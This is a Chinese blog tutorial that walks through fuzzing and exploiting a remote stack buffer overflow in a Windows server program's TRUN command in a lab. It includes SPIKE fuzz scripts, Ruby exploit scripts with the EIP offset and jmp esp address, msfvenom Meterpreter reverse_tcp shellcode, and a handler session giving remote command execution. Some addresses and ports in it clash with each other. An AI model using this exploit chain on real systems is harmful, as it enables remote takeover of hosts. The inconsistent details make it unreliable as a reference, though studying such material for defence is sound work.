远程缓冲区溢出简单分析

已于 2023-01-05 16:37:00 修改
阅读量5k 收藏 2
点赞数
文章标签: linux 安全 网络 运维 服务器
于 2019-08-30 11:25:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyshark_csdn/article/details/124939336
版权

执行模糊测试

模糊测试(Fuzzing),是用于漏洞挖掘的探测工作,主要用于发现那些函数存在漏洞,通过向目标系统提供非预期的输入并监视异常结果来发现软件漏洞的方法,其原理主要是通过输入大量数据,发现程序中存在的问题.可以通过使程序某些内容溢出出现异常,或者输入的是程序规定的范围内的数据结果出现异常,从而找出程序的bug.

尽管当今有许多模糊测试工具可以使用,但是在Kali Linux系统中默认集成了SPIKE,从技术上讲SPIKE实际上是一个模糊器创建工具包,它提供了API允许用户使用C语言基于网络的协议来创建自己的fuzzer,该工具可以通过编写脚本的方式进行测试任务,而无须自行编写上百行的测试代码.

创建测试脚本: 在测试之前,首先我们先来创建一个测试脚本,该脚本命名为lyshark.spk,脚本的内容如下.

root@kali:~# vim lyshark.spk

s_readline();              # 接收第一行的数据
s_string("stats |");       # 向目标发送字串开头
s_string_variable("A");    # 发送的主体字符串

测试STATS函数: 我们使用generic_send_tcp进行测试,测试服务器程序中stats函数是否存在漏洞,其命令如下:

root@kali:~# generic_send_tcp 192.168.1.10 9999 lyshark.spk 0 0

Fuzzing Variable 0:1198
line read=
Fuzzing Variable 0:1199
line read=
Fuzzing Variable 0:1200
line read=
Fuzzing Variable 0:1201
line read=
Fuzzing Variable 0:1202
line read=
Fuzzing Variable 0:1203
^C
root@kali:~#

经过上面的测试后,发现服务器程序并没有崩溃,只是出现了一些错误日志,则说明stats函数不存在远程溢出漏洞,接着我们修改测试代码,并继续测试.

修改测试脚本: 我们接着打开lyshark.spk这个测试脚本,修改测试函数,这里改为trun即可.

root@kali:~# vim lyshark.spk

s_readline();              # 接收第一行的数据
s_string("trun |");        # 向目标发送字串开头
s_string_variable("A");    # 发送的主体字符串

测试TRUN函数: 我们使用generic_send_tcp进行测试,测试服务器程序中trun函数是否存在漏洞,其命令如下:

root@kali:~# generic_send_tcp 192.168.1.10 9999 lyshark.spk 0 0

Fuzzing Variable 0:1198
line read=
Fuzzing Variable 0:1199
line read=
Fuzzing Variable 0:1200
line read=
Fuzzing Variable 0:1201
line read=
Fuzzing Variable 0:1202
line read=
Fuzzing Variable error
^C
root@kali:~#

经过上面的模糊测试,你会发现服务器端崩溃了,我们的服务器在应对二进制字符串时表现异常,其实这就是一个典型的远程缓冲区溢出漏洞,之所以会崩溃的原因是因为缓冲区没有进行合理的边界检测,从而超出了缓冲区的容量,恶意的字符串覆盖了EIP指针,导致服务器不知道下一跳去哪里取指令,从而崩溃了.

控制EIP指针

在上面的模糊测试环节,我们已经清楚的知道路目标服务器的,trun函数存在远程缓冲区溢出漏洞,接下来我们就来测试一下目标缓冲区的大小,这也是控制EIP指针的前提条件,现在我们需要具体的知道使用多少个字节才能够不多不少的覆盖掉程序中EIP寄存器,首先先来创建一个Ruby脚本,来完成远程对缓冲区的填充,这里Ruby的代码如下.

root@kali:~# vim lyshark.rb

require 'socket'
host = '192.168.1.10'
port = 9999
sock = TCPSocket.open(host, port)

command = "trun |"              # 指定要测试的函数
header = "/.:/"                 # 数据包发送固定写法
buf = "A" * 2000                # 生成2000个A(猜测)
eip = "BBBB"                    # 暂且填充为BBBB
nops = "\x90" * 20              # 填充20个nop指令

sock.gets()                              # 获取服务端返回的字符串
sock.puts( command+header+buf+eip+nops ) # 开始发送2000个A
sock.close

root@kali:~# ruby lyshark.rb

上面的代码主要作用是,生成2000个A,在Kali上运行代码后,发现服务器崩溃了,崩溃事件中还提供了具体的EIP地址,这说明脚本正常工作了.

接下来我们在服务器上,使用x64dbg调试器附加到MyServer.exe这个服务程序的进程上,并在调试器附加的基础上,再次执行lyshark.rb这个脚本.

当脚本运行后,不出所料程序再次崩溃,这里我们主要关心崩溃后的堆栈情况,下图可发现EIP指针为90904242,也就是说当前EIP一半在nop雪橇上另一半在AA上,由此我们可以猜测此时我们填充少了.

通过上面的EIP覆盖情况,发现填充物少填充了2个字符,接着我们修改攻击脚本,将填充物改大一些,这次我们改成2002,也就是说向远程堆栈内填充2002个A,重新运行服务器上的服务,并再次运行攻击脚本.

require 'socket'
host = '192.168.1.10'
port = 9999

sock = TCPSocket.open(host, port)

command = "trun |"              # 指定要测试的函数
header = "/.:/"                 # 数据包发送固定写法
buf = "A" * 2002                # 生成2002个A
eip = "BBBB"                    # 方便区分
nops = "\x90" * 50

sock.gets()
sock.puts( command+header+buf+eip+nops ) # 发送2002个A
sock.close

root@kali:~# ruby lyshark.rb

当攻击脚本运行后,我们查看一下EIP指针的位置,你会发现此时的EIP地址已经指向了42424242,也就是我们脚本中填充的eip = "BBBB",由此可得出填充物的大小刚好为2002个A,在下图的堆栈区域中,也可以清晰地看到我们填充的AAAAnop雪橇的分界线.


### 构建漏洞攻击过程

在上面的环节中我们已经确定了填充物的大小,但细心的你会发现程序每次运行其栈地址都是随机变化的,在Windows漏洞利用过程中,由于动态链接库的装入和卸载等原因,Windows进程的函数栈帧可能产生移位,即ShellCode在内存中的地址是动态变化的,因此需要Exploit(漏洞利用代码)在运行时动态定位栈中的ShellCode地址.

我们第一步就是寻找一个跳板,能够动态的定位栈地址的位置,在这里我们使用jmp esp作为跳板指针,其基本思路就是,使用内存中任意一个jmp esp的地址覆盖返回地址,函数返回后被重定向去执行内存中jmp esp指令,而esp寄存器的地址正好是我们布置好的nop雪橇的位置,此时EIP指针就会顺着nop雪橇滑向我们构建好的恶意代码,从而触发我们预先布置好的ShellCode代码.

选择模块: 首先通过x64dbg调试器附加服务程序,然后选择符号菜单,这里我找到了kernelbase.dll这个外部模块,模块的选择是随机的,只要模块内部存在jmp esp指令就可以利用.

搜索跳板: 接着搜索该模块中的jmp esp指令,因为这个指令地址是固定的,我们就将EIP指针跳转到这里,又因esp寄存器存储着当前的栈地址,所以刚好跳转到我们布置好的nop雪橇的位置上.

x64dbg调试器的反汇编界面中,按下ctrl + f 搜索,并记录下这个搜寻到的地址0x77433f73,其实这里随便一个只要是jmp esp 指令的都可以,我们将其作为EIP的跳转地址.

生成漏洞利用代码

当然可以从零开始构建漏洞攻击所使用的ShellCode但这需要你具备汇编的编程能力,不过庆幸的是Metaspoloit在这方面可以为我们做很多,我们可以通过MSF提供的msfvenom命令快速的生成一个有效载荷.

root@kali:~# msfvenom -a x86 --platform Windows \
>                              -p windows/meterpreter/reverse_tcp \
>                              -b '\x00\x0b' LHOST=192.168.1.2 LPORT=9999 -f ruby

Found 11 compatible encoders
Payload size: 368 bytes
Final size of ruby file: 1612 bytes
buf =
"\xba\x94\x23\x08\x8e\xdb\xd1\xd9\x74\x24\xf4\x5e\x33\xc9" +
"\xb1\x56\x31\x56\x13\x03\x56\x13\x83\xee\x68\xc1\xfd\x72" +
"\x78\x84\xfe\x8a\x78\xe9\x77\x6f\x49\x29\xe3\xfb\xf9\x99" +

最后在msf控制主机,启动一个侦听器,等待我们的攻击脚本运行。

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > set lhost 192.168.1.10
lhost => 192.168.1.10
msf5 exploit(multi/handler) > set lport 9999
lport => 8888
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.10:9999

经过上面的步骤我们已经构建出了漏洞利用代码,此时我们运行构建好的攻击代码。

require 'socket'
host = '192.168.1.10'
port = 9999
sock = TCPSocket.open(host, port)

command = "trun |"       #数据包包头写法
header = "/.:/"          #数据包发送固定写法

buf = "A" * 2002         #2002个字节刚好填充满
eip = "\x73\x3f\x43\x77" #EIP=77433F73  将该地址反写
nops = "\x90" * 20       #此处是nop雪橇填充的20个字节

shellcode =
"\xd9\xf7\xd9\x74\x24\xf4\x5a\xbb\xc8\xbb\x47\x96\x29\xc9" +
"\xb1\x56\x31\x5a\x18\x83\xc2\x04\x03\x5a\xdc\x59\xb2\x6a" +
"\x34\x1f\x3d\x93\xc4\x40\xb7\x76\xf5\x40\xa3\xf3\xa5\x70" +
"\xa7\x56\x49\xfa\xe5\x42\xda\x8e\x21\x64\x6b\x24\x14\x4b" +
"\x6c\x15\x64\xca\xee\x64\xb9\x2c\xcf\xa6\xcc\x2d\x08\xda" +
"\x3d\x7f\xc1\x90\x90\x90\x66\xec\x28\x1a\x34\xe0\x28\xff" +
"\x8c\x03\x18\xae\x87\x5d\xba\x50\x44\xd6\xf3\x4a\x89\xd3" +
"\x4a\xe0\x79\xaf\x4c\x20\xb0\x50\xe2\x0d\x7d\xa3\xfa\x4a" +
"\xb9\x5c\x89\xa2\xba\xe1\x8a\x70\xc1\x3d\x1e\x63\x61\xb5" +
"\xb8\x4f\x90\x1a\x5e\x1b\x9e\xd7\x14\x43\x82\xe6\xf9\xff" +
"\xbe\x63\xfc\x2f\x37\x37\xdb\xeb\x1c\xe3\x42\xad\xf8\x42" +
"\x7a\xad\xa3\x3b\xde\xa5\x49\x2f\x53\xe4\x05\x9c\x5e\x17" +
"\x71\xe3\xf6\xf7"

sock.gets()
sock.puts( command+header+buf+eip+nops+shellcode )
sock.close

查看攻击主机,即可看到一个反向连接shell,此时我们可以远程执行任意命令。

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.10:9999
[*] Sending stage (179779 bytes) to 192.168.1.10
[*] Meterpreter session 1 opened (192.168.1.10:9999 -> 192.168.1.2:9900) at 2019-03-27

meterpreter > sysinfo
Computer        : web-server
OS              : Windows Server2008.
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
微软技术分享
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
远程溢出实验
qq_43717119的博客
06-22 1822
远程溢出 【实验目的】 1、掌握远程溢出的基本原理; 2、掌握实现远程溢出的基本手段。 【实验环境】 同学A:运行server.exe 同学B:运行exploit.exe(命令格式:exploit.exe ipaddress 8888) 备注:同学A、B分别登录windows靶机,运行程序在D盘->攻防工具包->远程溢出 【实验预备知识点】 远程缓冲区溢出原理和本地缓冲区溢出原理一样,不同之处在于远程缓冲区溢出需要利用套接口进行远程连接。本小节通过一个例子来分析远程缓冲区溢出的工作原理和攻击过程
远程缓冲区溢出漏洞利用程序
08-03
怎样写远程缓冲区溢出漏洞利用程序 ? 在此,我们假设有一个有漏洞服务器程序(vulnerable.c). 然后写一个 exploit 来利用该漏洞,这样将能得到一个远程 shell。
Windows 远程栈溢出挖掘
weixin_30667649的博客
03-27 335
title: Windows 远程栈溢出挖掘 date: 2019-04-20 11:22:50 tags: 渗透测试 categories: 渗透测试 copyright: true --- 缓冲区溢出攻击很容易被攻击者利用,因为C/C++语言并没有自动检测缓冲区溢出操作,同时程序编写人员在编写代码时也很难始终检查缓冲区是否可能溢出.利用溢出,攻击者可以将期望数据写入漏洞程序内存中的任意位...
SIP协议固有的安全漏洞
-第二月-的专栏
12-05 3064
  同许多互联网协议一样,SIP(会话起始协议)协议是根据简化的思路,而不是根据安全的思路设计的。虽然H.323协议的创建是为了满足更广泛的目标,但是,安全问题也影响到了这个协议。这个协议本身就存在一些安全漏洞,把这个标准转化为产品的开发人员也为这个协议增加了一些安全漏洞。下面就是一些例子:  纯文本SIP信息是微不足道的,不值得修改或者插入,特别是在宽带网媒介上。虽然SIP没有加密,但是,可
Sipxtapi 长时间通话问题
pengpeng98的专栏
04-21 1625
  在使用了一段时间Sipxtapi 开源库制作的软电话,使用者给我反映一个问题,经常在长时间通话之后,软电话一端无法清除听到对方声音或者出现断断续续的声音.排出网络原因之后,确定应该是开源库的问题.  初步怀疑为本地RTP缓存没有及时清理,导致溢出,产生语音的碎片.试图修改RTP接受类,没有成功,采用另一种方法,定时刷新RTP缓存.方式如下.  (sipXcall.lib)SipCo
OGG(oracle goldengate)实现oracle到mysql异构环境数据同步
weixin_41229271的博客
09-24 1547
环境介绍 source 数据库版本:Oracle RDBMS 11.2.0.3 goldengate版本:OGG for oracle OGG-12.2.0.1 IP:192.168.1.1 安装目录:/home/oggs OGG数据库用户:ggs OGG数据库表空间:oggtbs target 数据库版本:MySQL 5.7.24 goldengate版本:OGG for mysql O...
IMS/SIP - Invite消息里的Cseq的作用以及什么时候需要增1?
yu_yuan_hong的专栏
11-23 1万+
首先我们要知道,User Agent必须维护它所发起或参与的呼叫的状态(state). 我们可以用一些头域(header fields)的组合来表示呼叫的状态。 这个头域组合的最小子集必须包括 local/remote tags, Call-ID, Cseq. (另外可以有route set等等状态信息。) 其中Cseq
远程缓冲区溢出攻击及防护 (2010年)
05-14
介绍了 Linux系统下缓冲区溢出的原理和 shellcode具体实现方法。阐述了远程 shellcode从 C代码到机器码的编写过程,并从成功率角度对...对缓冲区溢出常用的防护措施进行了分析,提出了 应对远程 shellcode的基本方法。
一种新的单字节缓冲区溢出技术
08-03
正如你所看到的,对于有单字节溢出的程序,同样也可以使用猜测shellcode地址的方法来进行攻击,这说明远程的单字节缓冲区溢出可以实现。但是并不是所有的单字节溢出都可以利用,例如说在大endian结构的系统下就不能...
一种远程缓冲区溢出漏洞检测模型及系统实现*) (2008年)
05-22
操作系统和应用软件中的潜在远程缓冲区溢出...本文采用面向二进制代码的动态分析方法,提出了基于错误注入技术的远程缓冲区溢出漏洞检测模型,介绍了系统结构和模块功能,详述了系统中关键技术,给出了系统测试结果。
防止缓冲区溢出攻击成为网络防护的弱点
03-04
更为严重的是,缓冲区溢出漏洞占了远程网络攻击的绝大多数,这种攻击可以使得一个匿名的Internet用户有机会获得一台主机的部分或全部的控制权!由于这类攻击使任何人都有可能取得主机的控制权,所以它代表了一类极其...
SIP 请求方法(1)-INVITE
至虛極,守靜篤
11-26 6942
SIP请求的类型,也称作SIP方法。RFC3261 中定义了六种方法。另外八种方法有独立的RFC扩展描述。 SIP请求或方法在协议中被视为“动词”,因为它们请求另一个UA或服务器执行一项特定的动作。INVITE、REGISTER、BYE、ACK、 CANCEL和 OPTIONS是SIP最初定义的六种方法。REFER、SUBSCRIBE、NOTIFY、PUBLISH、MESSAGE、UPDATE、INFO和 PRACK这些方法是在扩展的RFC中定义的。 ...
Kali渗透测试:对软件的溢出漏洞进行测试
Liu_Bruce的博客
05-20 706
Kali渗透测试:对软件的溢出漏洞进行测试 如何对一个软件进行渗透,渗透目标是FreeFloat FTP Server, 这是一款十分简单的FTP服务器软件。FreeFloat FTP Server会在运行的主机上建立一个FTP服务器,其他计算机上的用户可以登录这个FTP服务器来存取文件。如我们在IP地址为192.168.68.160的主机的C盘中运行FreeFloat FTP Server,在另一台计算机中可以使用FTP下载工具或者命令的方式对其进行访问。这里我们采用命令的方式对其进行访问,如下图所示:
shellcode,缓冲区溢出漏洞远程调call
任鸟飞2217777779的博客
02-13 1159
这个函数分配了8个字节的缓冲区,然后通过 strcpy 函数将传进来的字符串复制到缓冲区中,最后输出,如果传入的字符串大于 8的话就会发生溢出,并向后覆盖堆栈中的信息,如果只是一些乱码的话那个最多造成程序崩溃,如果传入的是一段精心设计的代码,那么计算机可能回去执行这段攻击代码。我们的shellcode 不能有00,否则 strcpy 会提前结束,所以 上面的代码中有字符串00结尾,需要我们修改成其他的代码形式。我们只要把返回地址覆盖成我们要执行的代码地址,就可以让该函数返回的时候去顺利执行我们的代码了.
远程堆栈溢出 原理篇
|游梦空间|
11-22 859
我们来研究windows系统下的远程溢出方法。 我们的目的是研究如何利用windows程序的溢出来进行远程攻击。 如果对于windows下的缓冲区溢出不是很熟悉,请大家复习我前面的文章: 《window系统下的堆栈溢出》(NsfocusMagzine 20003)。 本文以及后续的《实战篇》都是建立在该文基础上的。 让我们从头开始。windows 2000 Advanced Server(Buil
缓冲区溢出漏洞攻击——Shellcode编写
热门推荐
pianogirl123的博客
12-19 1万+
一、实验内容利用一个程序漏洞,编写shellcode,达成效果:蹦出对话框,显示“You have been hacked!(by JWM)”二、实验原理因为输入了过长的字符,而缓冲区本身又没有有效的验证机制,导致过长的字符覆盖了返回地址。如果覆盖的返回地址是一个有效地址,而在该地址处又有有效的指令,那么系统就会毫不犹豫地跳到该地址处去执行指令。本次实验中用到了跳板(jmp esp)由于操作系统每次
Windows系统下的远程堆栈溢出
sanshao27的专栏
04-17 1012
Windows系统下的远程堆栈溢出作者: Ipxodi第一篇 《原理篇》----远程溢出算法如何开一个远程shell呢? 思路是这样的:首先使敌人的程序溢出,让他执行我们的shellcode。我们的shellcode的功能就是在敌人的机器上用某个端口开一个telnetd 服务器,然后等待客户来的连接。当客户连接上之后,为这个客户开创一个cmd.exe,把客户的输入输出和cmd.
缓冲区溢出——远程代码执行问题
dsb2468的专栏
06-06 1224
1、 缓冲区溢出——远程代码执行问题 如上图,如果再输入数据时,不加以限制,则会出现,输入的数据覆盖19FEEA之后的区域,当覆盖到19FEEC区域的时候,就会影响到函数的返回执行代码。所以,如果用一段精心设计的代码,就可以执行任何想执行的操作(覆盖修改了函数的的返回地址,将返回地址改到19FEE0,就可以执行输入的代码了)   策略: ①   对输入的地方进行长度验证,比如上图的地方
远程溢出攻击
野生码农
01-24 4534
网络安全介绍 https://wenku.baidu.com/view/df861fd101f69e3142329427.html   远程溢出攻击   什么是远程溢出攻击? https://zhidao.baidu.com/question/537606563.html   大多溢出攻击都是针对缓冲区的溢出。当缓冲区溢出时,过剩的信息对电脑内存中原有内容进行完全替换,如未进行备份...
logonui缓冲区溢出
最新发布
09-17
LogonUI缓冲区溢出是一种计算机安全漏洞,指的是在Windows系统登录界面(LogonUI)中,由于缺乏有效的输入验证措施,导致恶意用户能够向缓冲区内注入超出其分配空间的数据,从而造成系统崩溃或者远程攻击的风险。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值